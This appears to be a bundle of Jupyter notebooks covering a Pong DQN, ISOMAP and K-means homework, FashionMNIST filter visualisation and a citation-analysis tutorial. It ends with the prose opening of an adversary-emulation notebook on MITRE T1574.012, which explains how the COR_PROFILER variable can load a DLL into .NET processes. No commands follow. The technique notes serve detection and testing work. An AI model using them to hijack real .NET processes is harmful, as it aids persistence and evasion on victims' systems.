plt.axis('off')
# -
# ### Save our model
# Let's save the weights in pickle format, so we don't need Caffe next time
# +
import pickle
values = lasagne.layers.get_all_param_values(net['prob'])
pickle.dump(values, open('model.pkl', 'wb'))
| python_notebooks/Theano/CIFAR_10/.ipynb_checkpoints/Using a Caffe Pretrained Network - CIFAR10-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Analysis: Citations by year
# +
import pandas as pd
from techminer import RecordsDataFrame
rdf = RecordsDataFrame(pd.read_json("step-07.json", orient="records", lines=True))
# -
rdf.citations_by_year()
rdf.citations_by_year().barhplot()
rdf.citations_by_year().barhplot("altair")
rdf.citations_by_year(cumulative=True).barhplot("altair")
rdf.documents_by_terms("Cited by")
rdf.documents_by_terms("Cited by").print_IDs()
| guide/tutorial/17-citations-by-year.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Flatten
from keras.optimizers import Adam
import matplotlib.pyplot as plt
# %matplotlib inline
# -
env = gym.make('Pong-v0')
# +
EPISODES = 300
GAMMA = 0.99
EXPLORE_INIT = 1.0
EXPLORE_FINAL = 0.01
MEMORY_SIZE = 17500
MEMORT_START_SIZE = 7500
BATCH_SIZE = 4
ACTION_SIZE = env.action_space.n
# -
# Remove outer game area and normalize to 0-1
def preprocess(image):
image = image / 255
image = image[34:194:3,0:160:3,0:3]
return image
def create_Q_model(learning_rate=0.001):
model = Sequential()
model.add(Conv2D(16, (3,3), padding='same', activation='relu', input_shape=(54, 54, 3)))
model.add(MaxPooling2D())
model.add(Conv2D(24, (3,3), padding='same', activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(32, (3,3), padding='same', activation='relu'))
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(128, activation='relu'))
model.add(Dense(ACTION_SIZE, activation='linear'))
optimizer = Adam(lr=learning_rate)
model.compile(loss='mse', optimizer=optimizer)
return model
class Memory():
def __init__(self, max_size):
self.buffer = deque(maxlen=max_size)
def add(self, experience):
self.buffer.append(experience)
def size(self):
return len(self.buffer)
def sample(self, batch_size):
idx = np.random.choice(
np.arange(len(self.buffer)),
size=batch_size,
replace=False
)
return [self.buffer[ii] for ii in idx]
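A quick sanity check of the replay-buffer pattern behind `Memory`: transitions accumulate up to `maxlen` (with the oldest evicted first), and sampling with `replace=False` draws distinct experiences. This sketch re-declares a minimal buffer with dummy transitions rather than reusing the class above:

```python
import numpy as np
from collections import deque

buffer = deque(maxlen=100)

# Fill with dummy (state, action, reward, done, next_state) tuples
for t in range(150):
    buffer.append((t, 0, 0.0, False, t + 1))

# Oldest entries were evicted once maxlen was reached
print(len(buffer), buffer[0][0])  # 100 50

# Sample a minibatch of distinct transitions
idx = np.random.choice(np.arange(len(buffer)), size=4, replace=False)
batch = [buffer[i] for i in idx]
print(len(batch), len(set(b[0] for b in batch)))  # 4 4
```

Sampling uniformly from a large buffer breaks the temporal correlation between consecutive frames, which is the point of experience replay in DQN.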
model = create_Q_model()
memory = Memory(max_size = MEMORY_SIZE)
f = open("log.txt", "w")
# +
explore_rate = EXPLORE_INIT
frame = 0
for ep in range(0, EPISODES):
env.reset()
state, reward, done, _ = env.step(env.action_space.sample())
state = preprocess(state)
state= np.expand_dims(state, axis=0)
frame += 1
total_reward = 0
explore_rate = EXPLORE_INIT - (EXPLORE_INIT - EXPLORE_FINAL) * (ep + 1) / EPISODES
while True:
if np.random.rand() > explore_rate:
action = np.argmax(model.predict(state)[0])
else:
action = env.action_space.sample()
next_state, reward, done, _ = env.step(action)  # step with the chosen action, not a fresh random one
next_state = preprocess(next_state)
next_state = np.expand_dims(next_state, axis=0)
frame += 1
# env.render()
total_reward += reward
# store the transition before advancing the state pointer
memory.add((state, action, reward, done, next_state))
state = next_state
if memory.size() >= MEMORT_START_SIZE:
minibatch = memory.sample(BATCH_SIZE)
inputs = np.zeros((BATCH_SIZE, 54, 54, 3))
targets = np.zeros((BATCH_SIZE, ACTION_SIZE))
for i, (state_b, action_b, reward_b, done_b, next_state_b) in enumerate(minibatch):
inputs[i:i+1] = state_b[0]
if done_b:
target = reward_b
else:
target = reward_b + GAMMA * np.amax(model.predict(next_state_b))
targets[i] = model.predict(state_b)[0]  # start from the current state's Q-values, then overwrite the taken action
targets[i][action_b] = target
model.fit(inputs, targets, epochs=1, verbose=0)
if done:
log_message = "Episode {}, Total Reward {}, Explore Rate {}".format(ep + 1, total_reward, explore_rate)
f.write(log_message + "\n")
f.flush()
print(log_message)
break
if ep % 5 == 0:
model.save('model.h5')
f.close()
# -
| pong-dqn.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## CSCI-UA 9473 Final Assignment
#
# ## <NAME>
# ### Part II. Unsupervised Learning (20pts)
# ### Exercise II.1. Clustering and latent representation
#
# The lines below can be used to load and display (low resolution) images of digits from 0 to 9. The labels associated to each image are stored in the vector $y$. From this vector, only retain the images representing $4$ and $3$. We will temporarily forget about the labels for now and learn a 2D representation of the images through ISOMAP.
# ### Import Libraries
from __future__ import division
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import pairwise_distances
from sklearn.metrics import pairwise_distances_argmin
from copy import copy, deepcopy
from numpy import linalg as LA
from sklearn.manifold import MDS
from scipy import linalg
# +
digits = datasets.load_digits(n_class=10)
X = digits.data
y = digits.target
plt.figure()
plt.imshow(np.reshape(X[0,:], (8,8)),cmap='gray',alpha=1)
plt.show()
# -
# # Question II.1.1 Building the graph (5pts)
#
# We will start by building the graph representing the data. For this, we will follow the steps below
#
#
# __1.__ Center the dataset as $\mathbf{x}_i \leftarrow \mathbf{x}_i - \mathbb{E}_i\mathbf{x}_i$
#
# __2.__ Compute the matrix of pairwise distances between the centered images. You can do this either by hand, noting that $D(\mathbf{x}_i, \mathbf{x}_j)^2 = \|\mathbf{x}_i\|^2 + \|\mathbf{x}_j\|^2 - 2\langle \mathbf{x}_i, \mathbf{x}_j\rangle$, or using a call to the 'pairwise_distances' function from scikit learn.
#
# __3.__ Once you have the distance matrix, obtain the matrix of scalar products by squaring the distances and applying double centering
#
# $$\mathbf{S} = -\frac{1}{2}(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)\mathbf{D}^2(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)$$
#
# where $\mathbf{1} = \left[1,1,\ldots,1\right]$ is a vector of all ones and $\mathbf{I}$ is the identity matrix.
#
# __4.__ Compute the graph representation. The graph $\mathcal{G} = (\mathcal{V}, \mathcal{E})$ is defined on a set of vertices $\mathcal{V}$ and a set of edges between those vertices $\mathcal{E}$. The set of vertices corresponds to the set of images in the original dataset. The set of edges will be defined according to the $K$-rule as explained below.
#
# We will represent the graph through its adjacency matrix $A$ where $A_{ij} = 1$ if we draw an edge between vertex $i$ and vertex $j$. To build this adjacency matrix, we will add an edge between image $\mathbf{x}_i$ and image $\mathbf{x}_j$ whenever $\mathbf{x}_j$ is among the $K$ nearest neighbors of $\mathbf{x}_i$.
#
#
#
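Step __2__ above rests on the identity $\|\mathbf{x}_i - \mathbf{x}_j\|^2 = \|\mathbf{x}_i\|^2 + \|\mathbf{x}_j\|^2 - 2\langle \mathbf{x}_i, \mathbf{x}_j\rangle$, which can be checked numerically on random data before applying it to the digits:

```python
import numpy as np

np.random.seed(0)
X = np.random.rand(10, 5)
n = X.shape[0]

# Vectorized: ||xi||^2 + ||xj||^2 - 2 <xi, xj>
sq_norms = np.sum(X ** 2, axis=1)
D2_manual = sq_norms[:, None] + sq_norms[None, :] - 2 * np.dot(X, X.T)

# Brute force squared distances for comparison
D2_loop = np.zeros((n, n))
for i in range(n):
    for j in range(n):
        D2_loop[i, j] = np.sum((X[i] - X[j]) ** 2)

print(np.allclose(D2_manual, D2_loop))
```

The vectorized form avoids the double loop and is how the "by hand" route scales to the full digits dataset.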
# # Solution
# ### Create List of 3's and 4's
# +
n_samples, n_features = X.shape
lst_3 = []
lst_4 = []
for id, value in enumerate(y):
if value == 3:
lst_3.append(X[id])
elif value == 4:
lst_4.append(X[id])
lst_3 = np.array(lst_3)
lst_4 = np.array(lst_4)
num_concat = np.concatenate((lst_3, lst_4))
targets = np.concatenate((3*np.ones(lst_3.shape[0]), 4*np.ones(lst_4.shape[0])))
print("Num of Samples: {} \nTotal features: {}\n".format(n_samples, n_features))
print("Target list: \n{}".format(targets))
# -
X_mean = num_concat - np.mean(num_concat, axis=0)  # step 1: subtract the mean image
print("\nCentered X: \n{}\n \nMean of centered X is: {}".format(X_mean, X_mean.mean()))
# ## Computing S using:
# $$\mathbf{S} = -\frac{1}{2}(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)\mathbf{D}^2(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)$$
# +
def center(X):
    '''Double centering of the squared pairwise distances:
       S = -1/2 (I - (1/n)11^T) D^2 (I - (1/n)11^T)'''
    dist_mat = pairwise_distances(X)  # use the argument, not the global X_mean
    dist_squ = np.square(dist_mat)
    instance = np.shape(dist_squ)[0]
    I = np.eye(instance)  # ones on the diagonal and zeros elsewhere
E = np.ones((instance, 1))
    S_first_term = np.dot((I - (1/instance)*np.dot(E, E.T)), dist_squ)
    S_second_term = (I - (1/instance)*np.dot(E, E.T))
    S = (-1/2)*np.dot(S_first_term, S_second_term)
return S
S = center(X_mean)
print("Shape of S: {}".format(S.shape))
# -
# ### Nearest Neighbour
def near_neighbor(k, X_mean):
k_mat = np.zeros((len(X_mean), k))
D = pairwise_distances(X_mean.astype(np.float64))
for val in range(len(X_mean)):
k_mat[val] = D[val,:].argsort()[1:k+1]
print("Shape of D is: {}\n\nK Neighbor Matrix: \n{}".format(D.shape,k_mat))
return k_mat, D
k = 5
k_mat, D = near_neighbor(k, X_mean)
# ### Creating Adjacency Matrix (Graph)
# +
def mat_adjacency(K, S, D):
A = np.zeros(shape = D.shape)
for val in range(S.shape[0]):
for val2 in range(S.shape[1]):
if val == val2:
continue
elif val2 in K[val]:
A[val][val2] = 1
            else:
                A[val][val2] = 999  # large weight standing in for "no edge"
print("A Matrix is: \n\n{}\n".format(A))
return A
S_mat = center(X_mean)
A = mat_adjacency(k_mat, S_mat, D)
# -
# # Question II.1.2 Computing the geodesic distances (5pts)
#
# __1.__ Once we have the graph representation of the data, we need to compute the shortest path between any two vertices in this graph (the shortest geodesic distance between any two images). To do that, connect the vertices that were not connected by the $K$ nearest neighbors approach with an edge of sufficiently large weight (to avoid having to take huge values, you might want to normalize the distances (resp. scalar products), for example by the norm of the matrix). You should then have an adjacency matrix $\mathbf{A}$ with $0$ on the diagonal and such that $A_{ij} = 1$ if the two images are connected and $A_{ij} = \infty$, or some large number, if they are not.
#
#
# __2.__ Let us denote the updated adjacency matrix as $\tilde{\mathbf{A}}$. From this matrix, we will now compute the shortest geodesic distance. That can be done through the Floyd-Warshall algorithm as indicated below.
#
# ### Code the Floyd-Warshall algorithm as follows:
#
#     for k = 1 to n
#         for i = 1 to n
#             for j = 1 to n
#
# $$\tilde{A}_{ij}\leftarrow\min(\tilde{A}_{ij}, \tilde{A}_{ik} + \tilde{A}_{kj})$$
#
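# A quick sanity check of the update rule on a tiny 3-vertex path graph (a hedged sketch; the graph and the 999 "no edge" weight are illustrative):

```python
import numpy as np

INF = 999  # large weight standing in for "no direct edge"

def floyd_warshall(A):
    # repeated relaxation: d[i,j] = min(d[i,j], d[i,k] + d[k,j])
    d = A.astype(float).copy()
    n = len(d)
    for k in range(n):
        for i in range(n):
            for j in range(n):
                d[i, j] = min(d[i, j], d[i, k] + d[k, j])
    return d

# path graph 0 -- 1 -- 2: no direct edge between 0 and 2
A = np.array([[0,   1,   INF],
              [1,   0,   1],
              [INF, 1,   0]])
geo = floyd_warshall(A)
```

# The shortest path from 0 to 2 goes through vertex 1, so its geodesic length is 2.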
# ## Solution
def Floyd_Warshall(A, N):
d = deepcopy(A)
for k in range(N):
for j in range(N):
for i in range(N):
d[i][j] = min(d[i][j], d[i][k]+ d[k][j])
return d
# + run_control={"marked": false}
N = A.shape[0]
d = Floyd_Warshall(A, N)
# -
print("Shape of d: {}\nd[0] is: \n{}\n".format(d.shape, d[0]))
# # Question II.1.3 Low dimensional projection (2pts)
#
# To conclude, from the matrix of geodesic distances, compute the low dimensional representation. Do this by
#
# 1. First getting the singular value decomposition of the geodesic distance matrix as $\mathbf{S}_\mathcal{G} = \mathbf{U}\mathbf{\Lambda}\mathbf{U}^T$. Define the projection as $\mathbf{I_{P\times N}}\mathbf{\Lambda}^{1/2}\mathbf{U}^T$ with $P=2$ (that is retain the first two rows of the matrix $\mathbf{\Lambda}^{1/2}\mathbf{U}^T$).
#
# 2. Represent each image $\mathbf{x}_i$ from the $2$ tuple encoded in the $i^{th}$ column of $\mathbf{I}_{2\times N}\mathbf{\Lambda}^{1/2}\mathbf{U}^T$. Display the result below.
#
# ##### Email Question Correction
# There is a mistake in Assignment 4, Question II.1.3. You have to compute the eigenvalue decomposition ($\mathbf{U}\mathbf{\Lambda}\mathbf{U}^T$) of the scalar product matrix $\mathbf{S}$ obtained from the square of the geodesic distance matrix ($\mathbf{S}$ can be obtained from $\mathbf{D}^2$ through double centering) and not from the geodesic distance matrix itself. In other words, from the Floyd-Warshall algorithm you get the graph (geodesic) distance matrix. But then, as you did in Q. II.1.1, you need to square the matrix of distances and then get the scalar product matrix from $\mathbf{D}^2$ by using double centering, i.e.
#
# $$\mathbf{S}_\mathcal{G} = -\frac{1}{2}(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)\mathbf{D}^2_\mathcal{G}(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)$$
#
# Once you have $\mathbf{S}_\mathcal{G}$ you can get the low dimensional representation by computing the eigenvalue decomposition and retaining the first two rows from $\mathbf{\Lambda}^{1/2}\mathbf{U}^T$.
#
# If you have done the computations for $\mathbf{D}$, doing it for $\mathbf{S}$ is straightforward though.
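# The projection step described in the correction can be sketched as follows (hedged: `mds_embedding` is our name; it assumes its argument is the double-centered scalar-product matrix):

```python
import numpy as np

def mds_embedding(S, p=2):
    # S = U Lambda U^T; keep the first p rows of Lambda^(1/2) U^T
    w, U = np.linalg.eigh(S)
    order = np.argsort(w)[::-1]                      # largest eigenvalues first
    w, U = w[order], U[:, order]
    return np.sqrt(np.clip(w[:p], 0, None))[:, None] * U[:, :p].T
```

# As a check, embedding the Gram matrix of centered 2-D points reproduces their pairwise distances.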
# # Solution
# +
def low_dimension(d):
    # Per the email correction: square the geodesic distances, double-center
    # to get S_G, then eigendecompose S_G = U Lambda U^T and keep the first
    # two rows of Lambda^(1/2) U^T.
    n = d.shape[0]
    J = np.eye(n) - np.ones((n, n)) / n
    S = -0.5 * J @ np.square(d) @ J
    w, v = LA.eigh(S)
    order = np.argsort(w)[::-1]                 # largest eigenvalues first
    w, v = w[order], v[:, order]
    f = np.sqrt(np.clip(w[:2], 0, None))[:, None] * v[:, :2].T
    U_U = np.column_stack((f[0], f[1]))
plt.rcParams['figure.facecolor'] = 'white'
plt.rcParams['axes.facecolor'] = '#FDEDEC'
plt.scatter(U_U[:183, 0], U_U[:183, 1], s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
plt.scatter(U_U[183:, 0], U_U[183:, 1], s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
return U_U
U_U = low_dimension(d)
# -
print("\nSome Values returned by Low_dimensionality Function:\n \n{}\n".format(U_U[:10]))
# ### Exercise II.2. (K-means)
# # Question II.2.1 (8pts)
#
# Now that we have a two dimensional representation for the images, we will use a clustering algorithm to learn how to distinguish between the two digits.
#
#
# __1.__ Start by splitting the dataset into a training and a validation set (let us take $90\%$ training and $10\%$ validation).
#
# __2.__ Initialize the $K$-means algorithm with $2$ centroids located at random positions
#
# __3.__ Assign each point to its nearest centroid as
#
# $$\mathcal{C}(\mathbf{x}_i) \leftarrow \underset{k}{\operatorname{argmin}} \|\mathbf{x}_i - \mathbf{c}_{k}\|^2$$
#
# __4.__ Update the centroids as
#
# $$\mathbf{c}_k \leftarrow \frac{1}{N_k}\sum_{\ell\in \mathcal{C}_k}\mathbf{x}_\ell,\quad k=1,2.$$
#
# __5.__ Make sure to properly treat empty clusters. If you end up with an empty cluster, restart the iterations by splitting the single cluster you have into two sub-clusters and define your new centroids as the centers of mass of those clusters.
#
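# Steps 3 and 4 in isolation, on a toy 2-D dataset (a hedged sketch; `assign_clusters` and `update_centroids` are illustrative names, not part of the assignment):

```python
import numpy as np

def assign_clusters(X, centers):
    # step 3: each point goes to its nearest centroid (Euclidean distance)
    d = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=-1)
    return d.argmin(axis=1)

def update_centroids(X, labels, centers):
    # step 4: centroid = mean of its assigned points;
    # empty clusters keep their old position here (one way to avoid NaNs)
    new = centers.copy()
    for k in range(len(centers)):
        if np.any(labels == k):
            new[k] = X[labels == k].mean(axis=0)
    return new
```

# Iterating these two steps until the centroids stop moving is exactly the loop implemented in the solution below.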
# # Solution
#
# Use this Equation
# $$\mathbf{c}_k \leftarrow \frac{1}{N_k}\sum_{\ell\in \mathcal{C}_k}\mathbf{x}_\ell,\quad k=1,2.$$
def K_means(X):
np.random.shuffle(X)
    '''Use 90% for training and 10% for validation'''
id_break = round(0.9*X.shape[0])
train = deepcopy(X[:id_break])
test = deepcopy(X[id_break:])
K, instance, count = 2, train.shape[0], train.shape[1]
    '''Mean, std and centroids'''
mean = np.mean(train, axis = 0)
std = np.std(train, axis = 0)
center = np.random.randn(K,count)*std + mean
'''Previous and New current centers'''
center_prev = np.zeros(center.shape)
center_curr = deepcopy(center)
'''Clusters'''
clusters = np.zeros(instance)
distances = np.zeros((instance,K))
err = np.linalg.norm(center_curr - center_prev)
'''Updating until Error = 0'''
while err != 0:
for i in range(K):
distances[:,i] = np.linalg.norm(train - center_curr[i], axis=1)
clusters = np.argmin(distances, axis = 1)
center_prev = deepcopy(center_curr)
        for i in range(K):
            if np.any(clusters == i):  # guard against empty clusters
                center_curr[i] = np.mean(train[clusters == i], axis=0)
err = np.linalg.norm(center_curr - center_prev)
labels = pairwise_distances_argmin(train, center_curr)
    print("Labels are: \n\n{}\n\n Centroids of the two clusters are: \n {}".format(labels,center_curr))
print("\n\nVisual Representation of two clusters")
plt.rcParams['figure.facecolor'] = 'white'
plt.rcParams['axes.facecolor'] = '#FDEDEC'
plt.scatter(train[:, 0], train[:, 1], c = labels, s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
return train, test, labels, err, center_curr
train, test, labels, error, center = K_means(U_U)
# ## Testing on Validation
new_label = pairwise_distances_argmin(test, center)
print("\nVisual Representation of Clusters on Validation Dataset")
plt.scatter(test[:, 0], test[:, 1], c = new_label, s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
# # End of Code for Unsupervised Section
| Regression_Tree_K-Means_Clustering_Reinforcement_Learning/Unsupervised_Learning_HW-03.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # FashionMNIST
# Load images from the [Fashion-MNIST data](https://github.com/zalandoresearch/fashion-mnist)
#
#
# The dataset comprises 60,000 small square 28x28-pixel grayscale images of items from 10 types of clothing, with class labels 0-9.
# Class labels:
# * 0: T-shirt/top
# * 1: Trouser
# * 2: Pullover
# * 3: Dress
# * 4: Coat
# * 5: Sandal
# * 6: Shirt
# * 7: Sneaker
# * 8: Bag
# * 9: Ankle boot
#
# ### Load the Fashion-MNIST data
# * Use ``torch.utils.data.dataset``
# * Data path: data
# * Apply transformations to the data (turning all images into Tensors for training a NN)
#
# ### Train and CNN to classify images
# * Load in both training and test datasets from the FashionMNIST class
#
#
#
# ## Import the Necessary Packages
# +
# basic torch libraries
import torch
import torchvision
# data loading and transforming
from torchvision.datasets import FashionMNIST
from torch.utils.data import DataLoader
from torchvision import transforms
# basic libraries
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# -
# ### The output of ``torchvision`` are PILImage images of range [0, 1]
# * Transform them to Tensor for input into a CNN
# +
# Define a transform to read the data in as a Tensor
data_transform = transforms.ToTensor()
# Choose the training and test datasets
path = './data'
# Training datasets
train_data = FashionMNIST(root=path,
train=True,
download=False,
transform=data_transform)
# Test datasets
test_data = FashionMNIST(root=path,
train=False,
download=False,
transform=data_transform)
# Print out some stats about the training data
print('Train data, number of images', len(train_data))
# Print out some stats about the training data
print('Test data, number of images', len(test_data))
# -
# ## Data iteration and batching
# ``torch.utils.data.DataLoader`` is an iterator that allows to batch and shuffle the data
#
# +
# shuffle the data and load in image/label data in batches of size 20
# Depends on large or small size of batch size will affect the loss
batch_size = 20
# load train
train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True)
# load test
test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=True)
# specify the image classes
classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
# -
# Calling ``next(dataiter)`` in the cell below loads one random batch of image/label data from the training dataset.
#
# It plots the batch of images and labels in a ``2 x batch_size/2`` grid.
#
# +
# obtain one batch of training images
# iter
dataiter = iter(train_loader)
images, labels = next(dataiter)  # dataiter.next() was removed in newer PyTorch versions
images = images.numpy() # convert to numpy
# plot the images in the batch with labels
fig = plt.figure(figsize=(25, 4)) # fig size
for idx in np.arange(batch_size):
    ax = fig.add_subplot(2, batch_size // 2, idx + 1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
ax.set_title(classes[labels[idx]])
# -
# ### NN Architecture
# * Architecture for simple ConvNet [INPUT-CONV-RELU-POOL-FC]
# * [NN Layers](http://pytorch.org/docs/master/nn.html)
# * Flattening is used to pass the output of a conv/pooling layer to a linear layer. In Keras you would use ``Flatten()``; in PyTorch, flatten an input ``x`` with ``x = x.view(x.size(0), -1)``
# * Keep track of the output dimension with ``output_dim = (W-F+2P)/S + 1``
# * Input volume size (W)
# * Receptive field size of the Conv Layer neurons (F)
# * The stride with which it is applied (S)
# * The amount of zero padding used (P)
#
# * Dropout randomly turns off perceptrons (nodes). It gives us a way to balance the network so that every node works equally towards the same goal, and if one makes a mistake, it won't dominate the behavior of the model. ``nn.Dropout()``
#
# We set dropout p = 0.4, which means that in each epoch each node gets turned off with probability 40 percent.
#
#
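# The output-size formula above can be wrapped in a small helper to double-check the layer shapes used in the network below (a hedged sketch; `conv_output_dim` is our name):

```python
def conv_output_dim(W, F, S=1, P=0):
    # (W - F + 2P) / S + 1, with PyTorch's floor behaviour for non-integer results
    return (W - F + 2 * P) // S + 1
```

# Tracing the network below: 28 -> conv 3x3 -> 26 -> pool 2/2 -> 13 -> conv 3x3 -> 11 -> pool 2/2 -> 5, matching the ``20*5*5`` input of the first linear layer.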
# # Necessary Packages for NN Module
import torch.nn as nn
import torch.nn.functional as F
# +
# Define Layers of a model
# Will use [INPUT-CONV-RELU-POOL-CONV-RELU-POOL-FC]
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel(grayscale), 10 output channels/features maps
# Applies a 2D convolution over an input signal composed of several input planes.
# 3x3 square convolution kernel
# output_dim = (28-3)/1 + 1 = 26
# output Tensor for one image will have the dimensions: (10, 26, 26)
self.conv1 = nn.Conv2d(1, 10, 3)
# maxpool layer with kernel_size=2, stride=2
# Output_dim = 26/2 = 13
# output Tensor for one image will have the dimensions: (10, 13, 13)
self.pool = nn.MaxPool2d(2,2)
# Apply Second conv layer: 10 inputs, 20 outputs
# 3x3 square convolution kernel
# output_dim = (13-3)/1 + 1 = 11
# output Tensor for one image will have the dimensions: (20, 11, 11)
self.conv2 = nn.Conv2d(10, 20, 3)
        # Output_dim for pooling after second conv: (20, 5, 5); 5.5 is rounded down
######
# FC
# # 20 outputs * the 5*5 filtered/poled map size
# # 10 output channels (for the 10 classes)
# self.fc1 = nn.Linear(20*5*5, 10)
# pool 10 -> 50
self.fc1 = nn.Linear(20*5*5, 50)
######
# dropout with p=0.4
self.fc1_drop = nn.Dropout(p=0.4)
# finally, create 10 output channels (for the 10 classes)
self.fc2 = nn.Linear(50, 10)
######
# feedforward behavior
def forward(self, x):
# Apply [CONV-RELU-POOL-CONV-RELU-POOL]
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
        # Flatten the output of the conv/pooling layers into a vector
        # before passing it to the linear layer
x = x.view(x.size(0), -1)
# One linear layer
x = F.relu(self.fc1(x))
# # Apply softmax layer to convert the 10 outputs (0-9) into a distribution prob of class scores
# x = F.log_softmax(x, dim=1)
####
# two linear layers with dropout in between
x = self.fc1_drop(x)
x = self.fc2(x)
####
return x
# -
# # Load in our trained net
# Will instantiate a model and load in an already trained network.
#
# * In the directory ``saved_models/``, trained data is saved from previous work.
# +
# Instantiate and print Net
net = Net()
# load the net parameter by name
path = 'saved_models/fashion_net_ex.pt'
net.load_state_dict(torch.load(path))
print(net)
# -
# # Feature Visualization
# Feature visualization helps us understand the inner workings of a CNN (how the machine recognizes patterns). CNNs learn to recognize a variety of spatial patterns, and you can visualize what each convolutional layer has been trained to recognize by looking at the weights that make up each convolutional kernel and applying those one at a time to a sample image.
#
#
# In the cell below, you'll see how to extract and visualize the filter weights for all of the filters in the first convolutional layer.
#
# Note the patterns of light and dark pixels and see if you can tell what a particular filter is detecting. For example, the filter pictured in the example below has dark pixels on either side and light pixels in the middle column, and so it may be detecting vertical edges.
#
# <img src='edge_filter_ex.png' width= 30% height=30%/>
#
#
# ### First Conv Layer
# +
# Get the weights in the first conv layer
weights = net.conv1.weight.data
w = weights.numpy()
# for 10 filters
fig=plt.figure(figsize=(20, 8))
columns = 5
rows = 2
for i in range(0, columns*rows):
fig.add_subplot(rows, columns, i+1)
plt.imshow(w[i][0], cmap='gray')
print('First convolutional layer')
plt.show()
weights = net.conv2.weight.data
w = weights.numpy()
# -
# ### Activation Maps
# Next, you'll see how to use OpenCV's filter2D function to apply these filters to a sample test image and produce a series of activation maps as a result. We'll do this for the first and second convolutional layers, and these activation maps should really give you a sense for what features each filter learns to extract.
# +
# obtain one batch of testing images
dataiter = iter(test_loader)
images, labels = next(dataiter)  # dataiter.next() was removed in newer PyTorch versions
images = images.numpy()
# select an image by index
idx = 3
img = np.squeeze(images[idx])
# Use OpenCV's filter2D function
# apply a specific set of filter weights (like the one's displayed above) to the test image
import cv2
plt.imshow(img, cmap='gray')
weights = net.conv1.weight.data
w = weights.numpy()
# 1. first conv layer
# for 10 filters
fig=plt.figure(figsize=(30, 10))
columns = 5*2
rows = 2
for i in range(0, columns*rows):
fig.add_subplot(rows, columns, i+1)
if ((i%2)==0):
plt.imshow(w[int(i/2)][0], cmap='gray')
else:
c = cv2.filter2D(img, -1, w[int((i-1)/2)][0])
plt.imshow(c, cmap='gray')
plt.show()
# -
# The filter in the top-left corner has a negatively weighted top row and positively weighted middle/bottom rows, and seems to detect the horizontal edges of sleeves in a pullover.
#
# ### Second Conv Layer
# +
# Same process but for the second conv layer (20, 3x3 filters):
plt.imshow(img, cmap='gray')
# second conv layer, conv2
weights = net.conv2.weight.data
w = weights.numpy()
# 2. second conv layer
# for 20 filters
fig=plt.figure(figsize=(30, 10))
columns = 5*2
rows = 2*2
for i in range(0, columns*rows):
fig.add_subplot(rows, columns, i+1)
if ((i%2)==0):
plt.imshow(w[int(i/2)][0], cmap='gray')
else:
c = cv2.filter2D(img, -1, w[int((i-1)/2)][0])
plt.imshow(c, cmap='gray')
plt.show()
# -
# In the second convolutional layer (conv2), the first filter looks like it may be detecting the background color (since that is the brightest area in the filtered image) and the more vertical edges of a pullover.
| 06_Feature_Visualization_FashionMNIST/.ipynb_checkpoints/Feature_Viz_FashionMNIST-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .ps1
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: .NET (PowerShell)
# language: PowerShell
# name: .net-powershell
# ---
# # T1574.012 - Hijack Execution Flow: COR_PROFILER
# Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
#
# The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
#
